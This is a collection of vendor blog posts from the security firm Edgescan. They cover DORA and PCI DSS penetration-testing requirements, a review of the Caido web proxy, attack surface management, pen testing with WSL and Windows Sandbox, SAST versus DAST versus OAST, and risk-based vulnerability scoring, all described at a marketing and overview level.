Test is a Requirement of DORAThe most significant requirement of DORA is the annual penetration testing for critical applications and systems, which can be fulfilled through the use of Edgescan.Edgescan Penetration Testing Service Meets DORA RequirementsThe good news is that most of the types of testing required by the standard are items that financial services organisations will be well familiar with and, indeed, the majority of which will already have ongoing secure testing programmes that include these items. Once organisations identify their critical systems in scope, we can onboard them and start testing immediately.Edgescan offers world-class penetration testing services globally through our Penetration Testing as a Service (PTaaS) platform.Testing, Reporting and Remediation!Our testing methodology more than meets the current criteria to cover the annual tests that are outlined in DORA specifications.Extensive and detailed reporting via the Edgescan platform gives you an ongoing view of the security posture for your critical assets with extensive reporting metrics and on-demand retesting.Plus, with remediation advice direct from our technical testing teams, demonstrating that any vulnerabilities identified have been remediated sufficiently and retested satisfactorily, will not be a problem. Threat-Led Penetration TestingEdgescan provides objective-based penetration testing (aka Red Teaming) capabilities using our CREST certified pen testers. The goal of standard penetration testing is to find ‘all the vulnerabilities’ that an adversary could leverage to breach a system or organisation. Red Teaming can be thought of as a narrow-scope penetration test, whereby you focus on an objective or end goal and leverage vulnerabilities to achieve this objective.The exact requirements for the once-per-three-year TLPT are still being finalized. We will continue to monitor and provide updates via social media and blog posts as more clarity on testing becomes available. Contact us today to see how Edgescan can help you meet DORA requirements. ### Caido – A New Contender for Web Application Proxying? Introduction Web application proxy tools are ubiquitous in a penetration tester's toolkit, whether for testing a web, mobile, or desktop application. If the application sends network traffic over HTTP(S), a web application proxy will be used as part of the penetration test. They come in multiple forms, from the widely popular Burp Suite and ZAP, to the lesser known mitmproxy, Fiddler, or Charles proxies. All proxy tools have some ever-present functionality, such as the ability to intercept and manipulate traffic as it is sent, or to replay requests with altered values. Some proxies like Burp Suite and ZAP, include the ability to perform automated testing against the application requests, to help the tester identify vulnerabilities. Recently a new tool has come onto the market. While it is still in beta, the tool called Caido is gaining popularity. Developed by a team of three, they state over 10,00 users at the time of writing and over 40 paid customers. They also have recently announced that Justin Gardner (@Rhynorater) and Ben Sadeghipour (@NahamSec), two well-known personalities in the bug bounty world, have joined the Caido development team as advisors. Like other proxies, there are different pricing plans for using Caido. There are currently three plans available: The free plan - which restricts the amount of functionality you can access, . The paid plan costs $200 a year - which provides access to all functionality in the application. The team plan, which costs $30 per month per user, allows centralised management of Caido across a team and includes custom features. While it is more or a traditional proxy, without the automated testing capabilities of Burp Suite or ZAP, there are a few features of Caido that are making it popular. Installation Caido can be installed straight from the website available at https://caido.io; it can be installed and run on Windows, Linux, and macOS systems. There are two options for installation, : a desktop application or a command-line interface (CLI). The desktop application is fully functional for Windows and macOS users, but is currently experimental for Linux users. While the CLI version is available for all systems. These options for installation allow Caido to be run locally on a tester's system or hosted remotely on a server specified by the tester. Features Projects Similar to other web application proxies, Caido allows users to create projects. However, unlike other proxies, these projects can be accessed at any time without restarting the proxy. They can be accessed from either the Workspace option at the bottom of the menu or at the top of the screen. Figure 1 Built-in Browser A recent feature in Caido, which other proxy tools such as Burp Suite or ZAP have long contained, is the ability to spawn a browser from within Caido. Currently, this only works for Chrome-based browsers. By selecting the Chrome symbol at the top of the screen, we get prompted to select the browser we can to open. Figure 2 This will spawn an instance of the browser, that is already proxied through Caido, with all the relevant certificates trusted. Figure 3 Replay Collections The Replay functionality in Caido works similarly to that found in other proxy tools; a request can be selected from the history and sent to Replay. However, in Caido there is the ability to create collections of requests. Figure 4 This allows testers to have multiple different requests grouped together for application functionality or for various tests they may be performing at a time, such as cross-site scripting or SQL injection. Workflows Workflows in Caido allow a tester to easily create an automated system that will perform actions depending on various states that Caido may encounter. For example, a tester could create a workflow that would run a locally installed tool if they encounter a certain hostname, or URL in a website. Depending on the plan used, this functionality is limited. The free version can only create one passive workflow and five convert workflows (decode/encode base64, for example). Figure 5 Assistant Another useful functionality for a tester is the Assistant, which is only available in paid plans. This allows us to ask certain questions about what we are testing to help us in our penetration test, such as why a cross-site scripting payload may not be working in a browser. Figure 6 Conclusion Caido is a new and up-and-coming web application proxy tool. It is being regularly updated by the development team and does have some useful functionality in it for a penetration tester. However, it has not reached its full potential yet. This will be a tool to watch, which could potentially join Burp Suite and ZAP as one of the go-to proxies for web application testing. ### ASM Done Right What is ASM?Attack Surface Management (ASM) provides you the ability to see all services exposed to the public internet across your global estate in real time.As new systems are deployed, decommissioned, or a system changes, ASM can inform you of the event. This is delivered in real time and on a continuous basis.ASM is about visibility. “We can’t secure what we can’t see.” Its purpose is to Identify security blind spots and map all assets discovered in your global IT ecosystems. It continuously evaluates information in real-time as new assets are deployed, decommissioned or as a system changes.Edgecan’s ASM also checks for potentially unknown systems which may be relevant to you and are avenues for an attack against your organization. Some edgescan features are:Fig 1. EASM Investigation StreamBrute-force subdomain enumeration uses a brute-force approach to guess potential subdomains of target domains. Why?Reducing Attack Surfaces: Subdomain enumeration helps identify and map the subdomains associated with a domain name. By discovering these subdomains, security professionals can narrow down the scope of an organisation’s landscape. Knowing which machines and resources are available allows for targeted assessments and reduces the preparatory work needed to locate and map the organization’s infrastructure. “Knowing what we have so we can secure our landscape”.Subdomain Enumeration is also designed to for detecting hidden applications which leads to additional vulnerability discovery.Last registrant exploration retrieves the last (most recent) registrant of a domain. Why?Understanding Ownership history. Security and trademark protection to help detect misuse or violation of intellectual property.Domain DNS resolution resolves the DNS records of a domain. Why?DNS resolution can assist with load balancing investigations, redundancy and failover and DNSSEC such as malware blocking, content filtering and global accessibility.Subdomain enumeration discovers subdomains of target domains by querying publicly available resources like search engines and social media. Why?Subdomain enumeration helps identify all subdomains associated with a domain. Cybersquatters spend time discovering additional targets beyond the main domain.Each subdomain potentially represents an opportunity for squatting. By enumerating subdomains, cybersquatters can find unknown applications or services that might be vulnerable or valuable for their purposes.Attackers may monetize or infect squatted subdomains through malware, ads, affiliate marketing, or selling them to the highest bidder. Subdomain enumeration helps them discover potential targets for such activities.Certificate retrieval and certificate health retrieves certificates for domains and reports their validity and expiration dates. Why?Assess encryption strength to detect weaknesses in cryptography which may result in breach or vulnerability. Assistance with compliance, given weak certificates can result in compliance fails.Revoking compromised certificates is important. Healthy certificates demonstrate adherence to security requirements.Search engines consider HTTPS (secured by TLS) as a ranking factor. Healthy certificates positively impact SEO.Service Discovery discover exposed ports and running services on discovered domains. Why?Understand your landscape and discover exposures related to what’s deployed. Not all exposures are vulnerabilities but simply services that should not be exposed (E.g., Remote desktop, FTP, Database exposed etc. – possibly to the service is unknown or firewall is misconfigured).HTTP Probing probe HTTP(s) service availability and status. Note that this is redundant if you are also using the Service Discovery task. It is offered as a lightweight alternative for situations where port scanning would not be appropriate.Registered Domains exploration finds domains that are registered or have been registered in the past by the same entity that registered a target domain. Why?Understanding the history of a domain may help with contact details, understanding SEO, blacklisting, past usage, domain reputation, and domain health.Typosquatting and similar domain discovery reports domains that are lexicographically similar to target domains. This can help identify typosquatting and domains using other TLDs with the same name. Note that this task can take a long time to complete and may generate a lot of noise.Fig 2. EASM Investigation types Why is it important?ASM is an important tenant in vulnerability detection and management. We need to continuously keep abreast of our landscape to help ensure it is all undergoing a level of vulnerability detection and focus.Is ASM Penetration Testing or Vulnerability Management?ASM is all about visibility The term has been twisted and stretched to include vulnerability scanning and Penetration testing but ASM in effect is measuring the landscape (attack surface). Once we understand the landscape we can “push” such intelligence to RBVM (Risk based Vulnerability Management) and tee up for penetration s required.How Edgescan looks at ASMEdgescan views ASM as 1. Discovery and mapping of landscape and, 2. Continuous profiling of discovered assets. Once items are discovered they may have some exposures which are not specifically CVE’s or “vulnerabilities” per se, but just services which should not be exposed (such as remote login, administration or database services exposed).In Edgescan you can add (via one-click) a newly discovered asset to our RBVM or PTaaS functions to undergo validated full stack scanning, API assessment or Web application Penetration as a Service (PTaaS).Fig 3. Adding a newly discovered asset in EASM to RBVM or PTaaSCoupling ASM with RBVM & PTaaSDiscover new assets not under vulnerability management or not undergoing PTaaS and unexpected assets owned by your organization which are a surprise.One-click to add the asset to an unlimited RBVM schedule or schedule for penetration testing.Continuously monitor asset for services, changes and exposures. It is as simple as that:ASM for visibility and landscape (attack surface) mappingRBVM for continuous scanning for Web applications and host/network vulnerabilities (full-stack)PTaaS for deep penetration testing using OSCP & CREST certified testers ### Navigating PCI DSS v4.0 with Edgescan The transition from PCI DSS v3.2.1 to PCI DSS v4.0 marks a significant shift towards a more proactive approach to payment security. PCI DSS v3.2.1 is set to retire on March 31, 2024, but certain requirements for PCI DSS v4.0 will not be necessary until a one-year grace period has occurred. Today, we will focus on the changes under Requirement 11 of PCI DSS v4.0, which concerns vulnerability scanning and penetration testing. First, we will explore the difference between Vulnerability Scanning and Penetration Testing according to PCI DSS v4.0, since this can be a point of confusion (no doubt exacerbated by certain vendors marketing “automated penetration testing” services). Vulnerability Scanning vs. Penetration TestingVulnerability scanning is an automated process to identify potential vulnerabilities in a network or web application. These scans serve as a preliminary step, providing a snapshot of potential security weaknesses that exist within an environment. Vulnerability scanners are tools, and their results need to be validated by humans afterward.Penetration testing, on the other hand, is not a tool. Rather it’s a service performed by experienced professionals. Penetration tests go much deeper than vulnerability scans that rely purely on automation. Defined by the PCI SSC, penetration testing involves a credentialed expert actively attempting to exploit vulnerabilities to determine how an attacker could potentially enter an environment. Penetration testing simulates real-world attack scenarios, to help define an organization’s potential exposure and devise a strategy to remediate these vulnerabilities.Vulnerability scanning is usually the first step when performing a penetration test, but a human is always required to interpret those results. A penetration test is not deemed adequate if it solely focuses on exploiting vulnerabilities identified in a scan. Penetration testers, with their deep knowledge of systems and potential attack strategies, manually probe for weaknesses. Some techniques employed by penetration testers to obtain this extra layer of depth would include fuzzing, injection, forgery tests, and business logic testing (scanners lack the real-world risk context that humans possess). They may use automated tools as part of their toolkit, but the expertise and creative problem-solving of the tester are indispensable since those qualities cannot be automated.For example, if a vulnerability scan identifies a potential weakness in an application server, a penetration tester may use this foothold to launch subsequent attacks that an automated tool would not attempt. By chaining exploits and using the compromised server as a staging point, testers can simulate complex attack paths that an attacker might use, uncovering layers of potential weaknesses that a scan alone would not be able to reveal.Penetration testing also includes the assessment of security monitoring and detection methods. Testers confirm the effectiveness of logging and file integrity monitoring mechanisms, aspects critical to an organization's ability to detect and respond to an attack. Requirement 11Quarterly Vulnerability ScanningUnder requirement 11.3.2, organizations are required to conduct vulnerability scans quarterly by a PCI SSC Approved Scanning Vendor (ASV). This adjustment emphasizes the importance of identifying vulnerabilities, but also resolving them following the ASV Program Guide's standards. While only quarterly scans are required, it’s encouraged to scan after significant changes to infrastructure or applications, such as adding new network devices or pushing deployments to production.The Edgescan platform only shows validated vulnerabilities, which means no false positives in Edgescan’s scanning results. On average, not having to validate false positives saves organizations a few hours of precious security resources every week. Annual Penetration Testing on Cardholder Data Environments (CDEs)The updated requirements, 11.4.2 and 11.4.3, mandate an annual penetration test on both internal and external CDEs. This requirement also mandates penetration tests following significant changes to infrastructure or applications. Verification of Remediation and Risk-Based ApproachThe new standard requires repeat testing to verify the effectiveness of corrective actions (11.4.4). In doing so, PCI DSS v4.0 also advocates for a risk-based approach to prioritizing remediation efforts.Edgescan offers unlimited, no-charge retesting on any penetration testing finding. This ensures that any remediation efforts are verified effectively, providing continuous compliance without the financial strain of paying for retesting days to verify remediation. Edgescan also dynamically risk rates every vulnerability according to EPPS (Exploit Prediction Scoring System), CISA (Cybersecurity and Infrastructure Security Agency) KEV (Known Exploited Vulnerability), CVSS (Common Vulnerability Scoring System) and asset criticality to ensure that you are properly triaging PCI failing vulnerabilities in the context of your organization. Segmentation Controls and Multi-Tenant Service ProvidersRequirement 11.4.5 necessitates testing segmentation controls annually or after any changes, critical for isolating the cardholder data environment (CDE). For multi-tenant service providers, the new standards (11.4.6) call for validating logical separation controls biannually with a penetration test. Another set of biannual penetration tests is required (A.1.1.4) for multi-tenant service providers to determine adequate separation between customers in their environment. Requirement 11.4.7 increases the emphasis on multi-tenant service providers to assist customers with their external penetration tests. ConclusionEdgescan is recognized as a PCI Approved Scanning Vendor (ASV) and offers an integrated platform where organizations can manage both their penetration testing findings and vulnerability scanning results. Consolidating these functions allows for a more efficient and holistic approach to maintaining PCI DSS v4.0 compliance.The transition to PCI DSS v4.0 will significantly impact how organizations approach vulnerability scanning and penetration testing. Edgescan's PCI compliance program utilizes a risk-based approach and unlimited, no-charge retesting on penetration testing findings to deliver simple but affordable PCI DSS v4.0 compliance.Book time with Edgescan ReferencesInformation Supplement: Penetration Testing GuidanceSummary of Changes from PCI DSS Version 3.2.1 to 4.0Requirements and Testing Procedures Version 4.0 ### Guide: How to Conduct Penetration Testing Using the Built-in Features of Windows Part Two In the second part of a two-part series, we will review each of the features in the order outlined above, provide background information about each one, explain their limitations and integrations, and offer installation details with tips on how to utilize them. Supporting graphics will also be included to make it easier to understand. Reverse Engineering Utilising Windows Sandbox What is Windows Sandbox? Microsoft introduced a feature called Windows Sandbox in the May 2019 update. It is designed to provide a lightweight desktop environment to run applications in an isolated system. All software and applications installed inside this environment remain sandboxed and run separately from the host machine. All files stored inside Windows Sandbox are temporary; once closed, all files and the state are deleted. However, with the Windows 11 22H2 update, the data will persist through a restart of the environment initiated inside the virtualised system. This new addition is intended to allow the installation of applications that require the OS to reboot. Figure 1. Screenshot showing Windows Sandbox   How to Install It Windows Sandbox is included in the core versions of Windows 10/11 Pro and Enterprise; it can be setup through the “Turn Windows features on or off” window. Figure 2. Screenshot showing the Windows Features where Sandbox can be enabled or disabled   How Pen testers can use the sandbox Now that we know what it is, how can this be used for penetration testing? We can use this feature in three ways for penetration testing; first, we can use it for testing thick clients or desktop applications, installing the software to this environment instead of our host machine. Second, if we perform a configuration review, we can use this environment to sign into the organisation accounts and keep them separate from our own. Finally, we can use this environment to test new tools and exploit scripts that require Windows to run without risking or endangering our host machine and network. Figure 3. Screenshot showing a sample configuration file.   This configuration file can be used to control different settings inside the environment, such as: Enabling or disabling the virtualised GPU Enabling or disabling network/internet access for the system Specifying which folders on the host machine, if any, it can have access to and whether that access includes read or write permissions. Specifying how much memory the system is allowed to utilise. Specifying a command to be run whenever the environment is started. If we were to start the Windows Sandbox environment using the sample configuration file above, we would get something like the following: Figure 4. Screenshot showing the environment after using the configuration file.   This environment would have access to a selection of reverse engineering tools hosted in one of the folders we provided read access to. The virtual GPU and network access have been disabled for the environment as well, and we’ve allowed it to access our downloads folder. Reverse Engineering Using Windows Sandbox With an environment setup like this from the configuration file specified, we can easily install some common reverse engineering tools such as Immunity Debugger or IDA. Figure 5. Screenshot showing the environment after installing Immunity Debugger and IDA   These reverse engineering tools will still work and function as they would on any other Windows environment but are isolated from your host machine in the same way as if you were running a Windows virtual machine inside VMWare or VirtualBox. Below are examples of four reverse engineering tools that can be run and utilized inside the sandbox environment, using Vulnserver as a target .exe file for each. Immunity Debugger Figure 6. Screenshot showing Immunity Debugger running inside the Sandbox   IDA Figure 7. Screenshot showing IDA running inside the Sandbox   dnSpy Figure 8. Screenshot showing dnSpy running inside the Sandbox   Radare2 Figure 9. Screenshot showing Radare2 running inside the Sandbox   Reminder While this is a security feature that Microsoft added to help protect users of Windows from malware, it can still become an avenue of attack for malicious parties. In 2020, a Reverse Engineer, Jonas Lykkegaard, released a zero-day vulnerability in Windows Sandbox on Twitter. https://twitter.com/jonasLyk/status/1300935382561894403 It allowed an unprivileged user to create an arbitrary file in the C:WindowsSystem32 folder during the activation of Windows Sandbox; this exploit required Hyper-V to be active on the machine in question. Conclusion What Good Are These for Us? To conclude, what good are these for us as penetration testers, and why would we want to use them over something like VMWare or VirtualBox for normal VMs and Android Studio for emulators? To begin with, they are faster to use and use fewer resources than the products. There is no need to wait for VMWare or VirtualBox to open and boot up the OS before you can access any tools within. As previously mentioned, there is also built-in integration between the host Windows operating system and these platforms. They are intended to add additional functionality and features to enrich the Windows operating system, and as such, more integrations will be added over time. If corporate policies block the installation and use of VMWare or VirtualBox, these features can bypass this policy. Alternatively, if your organisation uses Azure VMs, then VMWare and VirtualBox cannot be installed on the system. I was talking to a client recently who stated that he was not allowed to install VMWare or VirtualBox on his corporate machine to host a Kali Linux virtual machine. However, he got around this by installing the Kali Linux WSL image. Honourable Mentions Before we wrap this blog post up, there are some additional features introduced by Windows that deserve mention but do not warrant proper inclusion. In 2020, Microsoft released the Windows Package Manager, allowing users to install applications and services from the command line. It can be run from PowerShell or Command Prompt using the command winget. In 2022, Microsoft also released Dev Tunnels, a feature that allows users to share local web services on their machine across the internet. In the August 2023 update for VS Code, Microsoft introduced a feature to allow for locally running services to be shared over the internet. In 2019, Microsoft launched Windows Terminal, a terminal emulator. It became the default terminal application in Windows 11 and can be installed in Windows 10 through the Microsoft Store. It has a few useful features, such as window splitting and Quake Mode. ### Guide: How to Conduct Penetration Testing Using the Built-in Features of Windows Part One Windows has a reputation among security professionals for not being the best operating system for performing penetration tests. This is mainly because Unix-based OSs are more customizable than Windows, which is usually more restricted. However, in the last seven years, Windows has introduced new features to attract more developers, add more security to the system, and offer new experiences. These features include: Windows Subsystem for Linux (WSL): Provides a general-purpose penetration testing environment. Windows Sandbox: Can be used for various purposes, such as reverse engineering. Windows Subsystem for Android (WSA): Can be used as an emulation platform for testing Android applications. In this two-part series, we will review each of the features in the order outlined above, provide background information about each one, explain their limitations and integrations, and offer installation details with tips on how to utilize them. Supporting graphics will also be included to make it easier to understand. Part One: Test Environment Creation Using Windows Subsystem for Linux (WSL) What is Windows Subsystem for Linux (WSL)? Introduced in 2016 for Windows 10, the Windows Subsystem for Linux (WSL) was initially designed as an emulator to run Linux binaries within a Windows environment. However, on release, it had limited use for penetration testing due to poor support for features such as networking. In May 2019, WSL2 was released as an improved version of its predecessor. This update significantly changed how WSL worked, converting it into a more lightweight virtual machine. However, the base version of WSL2 did not include a desktop environment and remained a command-line-based utility. Operating Systems Used by WSL Several operating systems are available to be installed and run through WSL: Popular Distributions • Ubuntu (18.04 LTS, 20.04 LTS, 22.04 LTS, etc.) • Debian Enterprise Distributions • Oracle Linux (7.9, 8.5, 9.1) • openSUSE Leap 15.5 • SUSE Linux Enterprise Server 15 SP4 • SUSE Linux Enterprise 15 SP5 • openSUSE Tumbleweed Security Focused Distributions • Kali Linux Rolling Others are available through GitHub/Microsoft Store There is also functionality within WSL to import a Unix distribution from a tar file or create a custom Linux distribution for use in WSL. When installing WSL, the latest version of Ubuntu will be set up by default; however, the distribution can be changed to one of those listed above. Kali Linux The presence of Kali Linux as one of the officially supported distributions for WSL is of most interest to us as penetration testers. It is a blank distribution like the versions available on AWS or Azure, which Kali supports. A guide for installing Kali Linux in WSL can be found here: Kali WSL | Kali Linux Documentation Even though the distribution does not contain any penetration testing tools, they can easily be installed using the Kali Linux metapackages. Limitations of Windows Subsystem for Linux Before we go any further, there are some drawbacks to WSL which should be called out. The networking for the WSL virtual machine is set to use NAT during initialization, and there is no official support to change the networking type. Therefore, if you are trying to access the WSL virtual machine from an internal physical network, you will need to set up port forwarding in Windows. It should be noted that there is limited support for USB devices in WSL. While it is possible to pass USB drives through to the virtual machine, there is no official support for USB adapters such as Wi-Fi adapters. Virtualization software like VirtualBox or VMWare would be better if you need these two features for a penetration test. Otherwise, you can use WSL. Win-KeX Kali created a software package called Win-KeX to provide the WSL distribution of Kali Linux with a desktop environment. This can be installed using the guide available here: Win-KeX | Kali Linux Documentation. When installed, three different modes can be used to provide different desktop experiences: Window Mode: This mode opens a VNC window into Kali and provides a full desktop experience. Figure 1. Screenshot showing Win-KeX open in Window mode   Seamless Mode: This mode creates an overlap between Windows and Kali Linux; it places the Kali taskbar at the top of the screen to share the Windows desktop between Windows and Kali applications. Figure 2. Screenshot showing Win-KeX open in Seamless mode   Enhanced Session Mode: This mode makes use of protocols and clients that are natively installed in Windows; it opens an RDP window into the Kali virtual machine. It is designed for systems that are running Windows on ARM architecture. Figure 3. Screenshot showing Win-KeX open in Enhanced Session Mode Windows Integration Windows built integration between WSL and Windows into the core experience of WSL distributions. As part of this, the file system for either the WSL virtual machine or the host Windows system can be accessed from the other system. There is no need to create a shared folder to share files between the host and guest systems. Inside the WSL distribution, the Windows file system can be accessed from the /mnt folder, as seen below. Figure 4. Inside the WSL distribution, the Windows file system can be accessed from the /mnt folder Meanwhile, Windows 11 has a network shortcut in Windows Explorer to access the WSL file system. In Windows 10, the file system can be accessed by typing \wsl$ in the address bar of Windows Explorer. Figure 5. In Windows 11, you can access the WSL file system through a network shortcut in Windows Explorer. WSLg Windows has also recently introduced a feature into WSL called WSLg, which supports running Unix GUI applications on Windows in an integrated desktop environment using X11 and Wayland. This allows users to access tools in Kali Linux that run a GUI interface straight from inside Windows. These tools can be run straight from the start menu or Windows search bar. Figure 6. Screenshot showing that we can access several tools straight from the start menu. Figure 7. The screenshot shows that we can search for Kali Linux tools in the search bar. Network Scanning We can perform network scanning inside WSL by utilizing tools such as masscan, nmap, unicornscan, etc., that are installed as part of the Kali metapackages. Figure 8. The screenshot shows that we can run tools such as nmap or masscan Application Testing We can also perform testing against web applications by utilising tools such as DirBuster or Burp Suite that are installed as part of the Kali metapackages. Figure 9. The screenshot shows that we can run tools such as DirBuster Figure 10. The screenshot shows that we can perform web application testing using tools such as Burp Suite Non-Default Tools In addition, we can also access and use tools that are not installed in Kali Linux by default, such as BloodHound, a tool for viewing active directory domain information in a graph format. Figure 11. The screenshot shows that we can use non-default tools like BloodHound ### SAST vs DAST vs OAST The two most prominent approaches to application security testing are Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST). While both play critical roles in identifying vulnerabilities, there's a growing consensus in the cybersecurity community about the benefits of DAST when combined with Out-of-Band Application Security Testing (OAST). This article compares SAST, DAST, and OAST, while describing how DAST working together with OAST can paint the most comprehensive picture of a web application’s risk posture. SAST Static Application Security Testing (SAST) examines source code at a fixed point in time. It is a "white-box" testing method that analyzes an application from the inside out, checking the codebase for security flaws without executing the code. Benefits of SAST: Early Detection: Identifies vulnerabilities early in the development cycle. Comprehensive Code Coverage: Scans the entire codebase, including areas that might be missed during manual review. Language Specific: Customized to understand specific programming languages deeply. Limitations of SAST:  False Positives: The level of detail from SAST scanners generally leads to noisy results, generating false positives that require manual validation to prove they aren’t real vulnerabilities. This takes away time that could be spent on business or internal IT projects. If not, false positive results can be noisy and annoy developers! False Negatives/Limited runtime Analysis: Cannot identify issues that only appear during an application's execution. Legacy technology: May struggle to keep pace with the latest frameworks and languages, due to the specificity of SAST scanners. DAST Dynamic Application Security Testing (DAST) is a "black-box" technique that tests an application from the outside during runtime. It is designed to simulate the POV of a hacker trying to exploit vulnerabilities in web applications. DAST can be deployed in production or pre-production environments. Benefits of DAST:  Real-world Attack Simulation: Detects external attack surface vulnerabilities that only appear when the application is running. Language Agnostic: Works independently of the programming language, making it versatile for large enterprises with thousands of web applications. Identification of Runtime Issues: Catches problems related to authentication, session management, and more. Accurate results: DAST produces results with high accuracy and with very few false positives Limitations of DAST:  False positives/negatives: DAST is not ideal for discovering blind vulnerabilities or asynchronous bugs, but these weaknesses can be shored up by employing OAST.  - “Good” DAST should generally require validation to reduce noise again. Limited Code Visibility: Cannot pinpoint the exact location in the code where the vulnerability exists. OAST Out-of-band Application Security Testing (OAST) detects vulnerabilities that are not observable in standard responses from the tested application. OAST works by sending an attack payload that causes an interaction with a monitored external system sitting outside the target domain. The response received by an external system to the initial attack payload determines whether a vulnerability was discovered. DAST provides a realistic snapshot of an application’s security posture in production, but its capabilities are significantly enhanced when combined with OAST. Benefits of OAST:  Detection of Hidden Vulnerabilities: Ideal for identifying complex security issues, such as blind SQL injection, Server-side request forgery (SSRF) or OS Code Injection. Zero Day Coverage: SAST and DAST scanners typically rely on vulnerability signatures or patterns. OAST utilizes vulnerability signatures but also detects unusual responses that might indicate the presence of a zero-day vulnerability. The infamous Log4Shell vulnerability was discovered by capturing a DNS A request using out-of-band techniques. Identify Attack Surface: OAST can identify vulnerabilities in complex applications that include distributed architectures and microservices. It can even test APIs, whose vulnerabilities are becoming an increasingly popular attack vector. Conclusion SAST is ideal for early codebase analysis, while DAST excels in simulating real-world attack scenarios. SAST is a necessary tool for debugging before deploying a web application, but it doesn’t offer continuous coverage of your production environment or the ability to detect Runtime issues. Combining DAST with OAST offers a more comprehensive and actionable approach to security testing once an application has been deployed. OAST is particularly effective in detecting and addressing complex vulnerabilities like blind vulnerabilities, which might otherwise go unnoticed by traditional application security testing methods. DAST provides highly accurate results, where you can be sure the vulnerabilities being discovered are real. As cybersecurity threats grow more sophisticated, the integration of DAST with OAST represents a proactive trend in application security, ensuring more secure and resilient applications in an increasingly digital world. ### Edgescan eXposure Factor (EXF) Helping you prioritize vulnerability mitigation at scale Improving MTTR (Mean Time To Remediation) of critical weaknesses with EXF Prioritization is key once you can assume a list of validated and accurate vulnerabilities. Edgescan only ever delivers validated and accurate vulnerabilities with virtually no false positives. The ability to answer the question “What should I fix first?” dramatically improves efficiency when dealing with resource management and provides optimum value to your business and security posture. Let's fix and secure what matters. Edgescan has designed a system to help you easily figure out which vulnerabilities are most urgent: We call it EXF (Edgescan eXposure Factor), which uses dynamically generated breach probability data via: Exploit Prediction Scoring System (EPSS) combined with CVSS (Common Vulnerability Scoring System) score and; if the vulnerability is flagged by the CISA (Cybersecurity & Infrastructure Security Agency) and is on the CISA KEV (Known Exploitable Vulnerability catalogue). By combining this metadata and applying it to a discovered & validated vulnerability, Edgescan provides a simple 0 to 100 scoring system where a lower score indicates minimal risk and a higher score signifies greater vulnerability. • The Edgescan eXposure Factor is displayed to the user on the Vulnerabilities page under the title EXF. • EXF is re-calibrated daily via dynamic feeds to keep pace with exploitation intelligence “in the wild.” EXF values highlighted based on Vulnerability Severity/CVSS, EPSS, and CISA KEV presence. Combining EXF with other Asset Metadata: Edgescan gives you the ability to set the relative criticality and set associated metadata relating to an asset. By leveraging search criteria, you can focus on high EXF-scoring vulnerabilities across critical assets even if you have thousands of systems under management. E.g., “ Show me EXF scores for all assets marked critical across my global landscape….” Asset “Tagged” as “Critical.” Vulnerabilities with high CVSS scores and associated EPSS/EXF.   ### How to Achieve Continuous Visibility and Faster Remediation with a Modern Vulnerability Management System A review of the evolution of vulnerability management to understand the components necessary for modernizing security programs.While modern-day strategies for a complete and effective security posture must include a combination of proactive and reactive security tools and processes, a fundamental component must always be vulnerability management. While not a new technology or process by any means, vulnerability management (VM) remains a key tool in any enterprise’s security toolbox and should be used as part of its overall security best practices.Traditionally, vulnerability management systems helped security teams identify, evaluate, prioritize, and mitigate public exposure and vulnerabilities in their organization’s critical assets to reduce the attack surface and maintain compliance. From the beginning, the fundamental goal was continuous visibility across an organization's global attack surface.These principles haven’t changed since the inception of vulnerability scanners over 20 years ago. However, the evolving attack vectors in organizations' hybrid and multi-cloud environments have introduced new challenges to their effectiveness. Furthermore, the way enterprises implement their vulnerability management systems has changed because of infrastructure evolution.Let's briefly examine how we arrived at this point and identify some VM pitfalls that your organization, hopefully, is no longer subject to.What is the difference between a vulnerability management system, vulnerability management software, and a vulnerability solution?A vulnerability management system is a holistic approach to managing a vulnerability program and utilizes various software, tools, solutions, and advanced analytics to achieve this. An effective VM system addresses four stages: vulnerability identification, prioritization, remediation, and reporting, and provides the fastest, most accurate findings.This article looks at the entire system of the vulnerability process and the components needed to achieve the most effective outcome to achieve continuous visibility. Late 1990s and Early 2000sScan and Patch ItWithout a doubt, deploying VM scanners worked successfully to identify and report on vulnerabilities across enterprises. While mostly a manual process, SecOps teams could handle the required assessment workload with this tedious “find it, patch it” approach. However, as networks expanded, VM scanners would slow network traffic and critical applications (i.e., VoIP) due to high utilization. Soon, VM scanning became a necessary evil that was scheduled at select times to not hinder network throughput and business productivity.A Decade Ago – 2010sAutomation and Rating ToolsWith the ongoing goal of ‘continuous visibility’ and fast remediation, VM systems evolved beyond scanning appliances and objective CVSS-based ratings. Vulnerability Management platforms implemented more automation of threat detection and remediation capabilities to expedite incident resolution and scale to support large, expanding enterprises. To save time and money, VM systems provided automated playbooks and workflow presets to increase efficiency and reduce human error, while some VM systems added more vulnerability rating tools beyond just CVSS. However, with the adoption of cloud services, the attack surface expanded, the number of vulnerabilities increased exponentially, and security teams were, once again, overwhelmed as not all incidents could be readily addressed and prioritized. A new approach was again needed.Today – 2020sThe Rise of Risk-based Vulnerability ManagementWithout question, risk-based prioritization is essential for modern vulnerability management. Still based on a continuous visibility foundation, advanced vulnerability management solutions utilize multiple techniques to discover and assess the more transient devices and systems in today’s dynamic cloud and mobile environments. Up-to-the-minute inventory discovery and assessment is essential as services and users come and go on the network.One of the most significant advancements in VM systems is the fact that modern security solutions now rely on advanced vulnerability and threat intelligence to discover and assess new cloud services and mobile devices. This intelligence is coupled with risk-rating tools to prioritize threats and exposures more accurately to address the most business-critical vulnerabilities first, providing prioritized remediation efforts. The most effective Risk-based Vulnerability Management (RBVM) solutions combine multiple rating systems while analyzing and mitigating known and unknown threats based on true business risk vs. just incident severity level.Risk-Based Vulnerability ManagementA Key Component of a Modern Vulnerability Management SystemEdgescan’s Risk-based Vulnerability Management solution is a key component of its integrated security platform and a necessary tool for a modern vulnerability management system. It delivers validated vulnerability data and quickly rates the severity level of each exposure using a proprietary scoring process called EVSS (Edgescan Validated Security Score). The platform also uses these industry-established risk-rating systems:CVSS — Common Vulnerability Scoring SystemEPSS — Exploit Prediction Scoring SystemCISA KEV — CISA Known Exploited VulnerabilityThe Edgescan is a full-stack platform that integrates RBVM software along with four essential security technologies into one platform; these solutions include:Penetration Testing as a Service (PTaaS)External Attack Surface Management (EASM)Application Security Testing (AST)
